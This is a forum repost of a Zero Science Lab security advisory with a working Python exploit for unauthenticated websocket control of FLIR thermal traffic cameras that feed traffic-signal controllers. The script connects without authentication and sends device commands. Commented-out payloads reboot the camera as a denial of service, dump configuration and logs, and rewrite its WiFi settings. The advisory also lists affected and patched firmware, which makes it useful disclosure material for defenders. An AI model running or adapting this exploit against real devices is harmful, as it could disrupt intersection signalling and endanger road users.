1. Здраво и добредојдовте на форумот на IT.mk.

    Доколку сеуште не сте дел од најголемата заедница на ИТ професионалци и ентузијасти во Македонија, можете бесплатно да се - процесот нема да ви одземе повеќе од 2-3 минути, а за полесна регистрација овозможивме и регистрирање со Facebook и Steam.
    Сокриј

FLIR Systems FLIR Thermal Traffic Cameras Websocket Device Manipulation

Дискусија во форумот 'Ранливости // Експлоити // Закрпи' започната од zeroscience, 6 oктомври 2018.

  1. zeroscience

    zeroscience
    ZSL Bot v4.89.1.00

    569
    507
    31 Мај 2010
    Код:
    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    #
    # FLIR Systems FLIR Thermal Traffic Cameras Websocket Device Manipulation
    #
    #
    # Vendor: FLIR Systems, Inc.
    # Product web page: https://www.flir.com
    #
    # Affected firmware version: V1.01-0bb5b27 (TrafiOne)     Codename: TrafiOne
    #                            E1.00.09      (TI BPL2 EDGE) Codename: TIIP4EDGE
    #                            V1.02.P01     (TI x-stream)  Codename: TIIP2
    #                            V1.05.P01     (ThermiCam)    Codename: ThermiCam
    #                            V1.04.P02     (ThermiCam)    Codename: ThermiCam
    #                            V1.04         (ThermiCam)    Codename: ThermiCam
    #                            V1.01.P02     (ThermiCam)    Codename: ThermiCam
    #                            V1.05.P03     (TrafiSense)   Codename: TrafiSense
    #                            V1.06         (VIP-IP)       Codename: VIP-IP
    #                            V1.02.P02     (TrafiRadar)   Codename: TrafiRadar
    #
    # Vendor patched firmware version:
    #
    # Product name                Firmware      Released
    # ----------------------------------------------------
    # ThermiCam / TrafiSense      E1.06.03      17.09.2018
    # TI BPL2 EDGE                V1.00         17.09.2018
    # TI x-stream                 E1.03.02      17.09.2018
    # TrafiOne                    E1.02.02      17.09.2018
    # ----------------------------------------------------
    #
    # Summary: FLIR TrafiOne is an all-round detection sensor for traffic monitoring
    # and dynamic traffic signal control. Offered in a compact and affordable
    # package, the FLIR TrafiOne uses thermal imaging and Wi-Fi technology to
    # adapt traffic signals based on the presence detection of vehicles, bicycles
    # and pedestrians while at the same time generating high resolution data at
    # intersections and in urban environments. FLIR TrafiOne helps traffic engineers
    # to improve traffic flows, reduce vehicle idling time, monitor congestion,
    # enhance safety for vulnerable road users, collect data and measure travel and
    # delay times for different transport modes.
    #
    # FLIR TrafiCam is a vehicle presence sensor that combines a CMOS camera and a
    # video detector in a single unit. FLIR TrafiCam detects moving and stationary
    # vehicles at signalized intersections. Via detection outputs or via IP protocol,
    # vehicle presence information is transmitted to the traffic controller so that
    # signal timing can be adjusted dynamically. This way, vehicle waiting time at
    # traffic lights is reduced and traffic flows are optimized.
    #
    # FLIR TrafiSense is an integrated thermal sensor and detector for vehicle and bike
    # detection. TrafiSense does not need light to operate, but uses the thermal energy
    # emitted from vehicles and bicyclists. This enables the sensor to detect vehicles
    # and bikes in the darkest of nights, over a long range and in the most difficult
    # weather conditions. The result is reliable, 24/7 traffic detection for a wide
    # range of applications.
    #
    # FLIR TrafiRadar vehicle presence sensor is a combination of a video sensor and
    # radar. TrafiRadar is typically used for stop bar and advance vehicle presence
    # detection, traffic adaptive systems, and dilemma-zone protection and thus improves
    # traffic safety and efficiency at signalized intersections. TrafiRadar will warn
    # traffic light controllers whenever a vehicle is present in the dilemma zone, either
    # extending green or red lights to improve overall safety.and stationary vehicles at
    # signalized intersections and collect traffic data at intersections or interurban
    # roads. Via detection outputs or via IP protocol, vehicle presence information is
    # transmitted to the traffic controller so that signal timing can be adjusted
    # dynamically. TrafiCam x-stream offers streaming video at full frame rate, to be
    # used for traffic monitoring in a control room.
    #
    # The VIP series offers multi-functional Video Image Processing modules for traffic
    # control. VIP boards integrate automatic incident detection, data collection,
    # recording of pre and post incident image sequences and streaming video in one
    # board. VIP modules have been installed for road and tunnel projects all over the
    # world.
    #
    # Desc: FLIR thermal traffic cameras suffer from an unauthenticated device manipulation
    # vulnerability utilizing the websocket protocol. The affected FLIR Intelligent
    # Transportation Systems - ITS models use an insecure implementation of websocket
    # communication used for administering the device. Authentication and authorization
    # bypass via referencing a direct object allows an attacker to directly modify running
    # configurations, disclose information or initiate a denial of service (DoS) scenario
    # with Reboot command. The devices do not support the usage of TLS 'wss://' prefix for
    # WebSocket Secure connection making the network traffic disclosed in plain-text to
    # MitM evil-doers. Also, the web service has an Origin validation security issue and
    # is vulnerable to Cross-Site WebSocket Hijacking (CSWSH).
    #
    # ---
    # Request:
    #
    # GET ws://192.168.1.1:13042/ws/xml2 HTTP/1.1
    # Host: 192.168.1.1:13042
    # Connection: Upgrade
    # Pragma: no-cache
    # Cache-Control: no-cache
    # User-Agent: Bond/00.7
    # Upgrade: websocket
    # Origin: zeroscience.mk:1337
    # Sec-WebSocket-Version: 13
    # Accept-Encoding: gzip, deflate
    # Accept-Language: en-US,en;q=0.9
    # Cookie: tmhDynamicLocale.locale=%22en%22
    # Sec-WebSocket-Key: A5SH9PRtc3rYF49kKO4vmw==
    # Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
    #
    # Response:
    #
    # HTTP/1.1 101 Switching Protocols
    # Server: nginx/1.10.2
    # Date: Mon, 13 Aug 2018 02:48:46 GMT
    # Content-Length: 0
    # Connection: upgrade
    # Upgrade: WebSocket
    # Sec-WebSocket-Accept: QyXaTdjpCsAyxhVnVqjMg95jepk=
    #
    # ---
    # No HTTP/1.1 401 Unauthorized response observed.
    #
    # Tested on: nginx/1.12.1
    #            nginx/1.10.2
    #            nginx/1.8.0
    #            Websocket/13 (RFC 6455)
    #
    #
    # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    # Zero Science Lab - https://www.zeroscience.mk
    #
    #
    # Advisory ID: ZSL-2018-5490
    # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5490.php
    #
    # Vendor firmware updates: https://www.flir.com/security/best-practices-for-cybersecurity/
    # Vendor cyber hardening guide: https://www.flir.com/globalassets/security/flir-pro-security-cyber-hardening-guide.pdf
    #
    #
    # 26.07.2018
    #
    
    from websocket import create_connection as t00t
    import time
    import sys
    
    endpoint = "/ws/xml2"
    
    if (len(sys.argv) <= 2):
        print '[*] Usage: exploit.py <ipaddress> <port>'
        exit(0)
    
    host = sys.argv[1]
    port = sys.argv[2]
    
    # Supported message types:
    '''
    <Message Type="SupportedMessages">
    <Body>
        <Message Type="GetMessageConstraints"/>
        <Message Type="GetSupportedMessages"/>
        <Message Type="Session"/>
        <Message Type="Subscription"/>
        <Message Type="ClearData"/>
        <Message Type="GetConnectionInformation"/>
        <Message Type="GetData"/>
        <Message Type="GetEvents"/>
        <Message Type="GetLostData"/>
        <Message Type="GetManagedBy"/>
        <Message Type="GetPresenceData"/>
        <Message Type="GetPresenceLevel"/>
        <Message Type="GetPresenceLevelHistory"/>
        <Message Type="GetStorageLimits"/>
        <Message Type="SetConnectionSettings"/>
        <Message Type="SetManagedBy"/>
        <Message Type="ClearBootCount"/>
        <Message Type="ClearHistogram"/>
        <Message Type="ClearStoredCounter"/>
        <Message Type="ClearSystemLogs"/>
        <Message Type="CreateAviSequence"/>
        <Message Type="DoBadStuff"/> <-- ;]]
        <Message Type="ForceEvent"/>
        <Message Type="ForceKeyframe"/>
        <Message Type="GetBootCount"/>
        <Message Type="GetBplSettings"/>
        <Message Type="GetCameraConfiguration"/>
        <Message Type="GetCameraDefinitions"/>
        <Message Type="GetCameraSettings"/>
        <Message Type="GetConfiguration"/>
        <Message Type="GetConstraints"/>
        <Message Type="GetCpuStatistics"/>
        <Message Type="GetDateTime"/>
        <Message Type="GetDisplayOverlay"/>
        <Message Type="GetEventLog"/>
        <Message Type="GetEventsDescription"/>
        <Message Type="GetFrameFlow"/>
        <Message Type="GetHardwareInformation"/>
        <Message Type="GetHardwareSensors"/>
        <Message Type="GetHistogram"/>
        <Message Type="GetImage"/>
        <Message Type="GetImageSharpness"/>
        <Message Type="GetLeptonSettings"/>
        <Message Type="GetLoggingActivation"/>
        <Message Type="GetMemoryStatistics"/>
        <Message Type="GetNumberOfOutputs"/>
        <Message Type="GetOpenEvents"/>
        <Message Type="GetOutputsState"/>
        <Message Type="GetPermissions"/>
        <Message Type="GetProductInformation"/>
        <Message Type="GetSocketInformation"/>
        <Message Type="GetState"/>
        <Message Type="GetStoredCounter"/>
        <Message Type="GetSystemLogs"/>
        <Message Type="GetTemperature"/>
        <Message Type="GetThermalQualityHistogram"/>
        <Message Type="GetThermalQualityReferenceImage"/>
        <Message Type="GetThreadInformation"/>
        <Message Type="GetTime"/>
        <Message Type="GetTranslations"/>
        <Message Type="GetUpTime"/>
        <Message Type="GetVersion"/>
        <Message Type="GetVoltage"/>
        <Message Type="GetWifiInformation"/>
        <Message Type="KeepAlive"/>
        <Message Type="Notify"/>
        <Message Type="PauseDetectionFramework"/>
        <Message Type="Reboot"/>
        <Message Type="SetBplSettings"/>
        <Message Type="SetCameraConfiguration"/>
        <Message Type="SetCameraSettings"/>
        <Message Type="SetConfiguration"/>
        <Message Type="SetConstraintsFilter"/>
        <Message Type="SetDateTime"/>
        <Message Type="SetDisplayOverlay"/>
        <Message Type="SetHardwareInformation"/>
        <Message Type="SetLeptonSettings"/>
        <Message Type="SetLoggingActivation"/>
        <Message Type="SetTime"/>
        <Message Type="SetWifiInformation"/>
        <Message Type="UpdateFrameFlow"/>
    </Body>
    </Message>
    '''
    
    socket = t00t("ws://"+host+":"+port+endpoint)
    
    #print 'Sending Reboot message type (DoS)...'
    #msg = '<Message Type=\"Reboot\"></Message>'
    #print 'Getting supported messages...'
    #msg = '<Message Type=\"GetSupportedMessages\"></Message>'
    #print 'Getting system logs...'
    #msg = '<Message Type=\"GetSystemLogs\"></Message>'
    #print 'Getting device configuration...'
    #msg = '<Message Type=\"GetConfiguration\"></Message>'
    #print 'Setting new Wifi information...'
    #msg ='''
    #<Message Type="SetWifiInformation">
    #    <Body Present="0" SSID="pwned" Channel="11" Hidden="0" Mode="AccessPoint" />
    #</Message>
    #'''
    
    msg = '<Message Type=\"GetProductInformation\"></Message>'
    
    socket.send(msg)
    print 'Message sent.'
    print 'Receiving...'
    time.sleep(2)
    priem =  socket.recv()
    print 'Received data: \n%s' % priem
    socket.close()
    

    Zero Science Lab » FLIR Systems FLIR Thermal Traffic Cameras Websocket Device Manipulation
     

Сподели

Вчитување...